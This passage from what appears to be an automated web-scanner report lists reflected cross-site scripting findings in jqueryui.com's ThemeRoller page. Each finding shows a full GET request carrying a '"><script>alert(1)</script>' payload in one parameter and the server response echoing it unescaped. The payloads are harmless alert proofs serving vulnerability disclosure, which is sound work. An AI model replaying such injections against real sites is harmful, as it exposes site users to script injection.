GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.74. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8af"><script>alert(1)</script>bb639f52f51 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.75. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7769a"><script>alert(1)</script>1f24aa516b9 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.76. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a1"><script>alert(1)</script>07a06ed0f2b was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.77. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f6c"><script>alert(1)</script>4d606b712ae was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.78. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e1d"><script>alert(1)</script>b0705c51f was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 119997

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.79. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ba"><script>alert(1)</script>c860704192d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.80. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5e2"><script>alert(1)</script>5ad0d53056f was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.81. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb42"><script>alert(1)</script>d0177921a09 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.82. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540e"><script>alert(1)</script>2fec129ecd0 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgI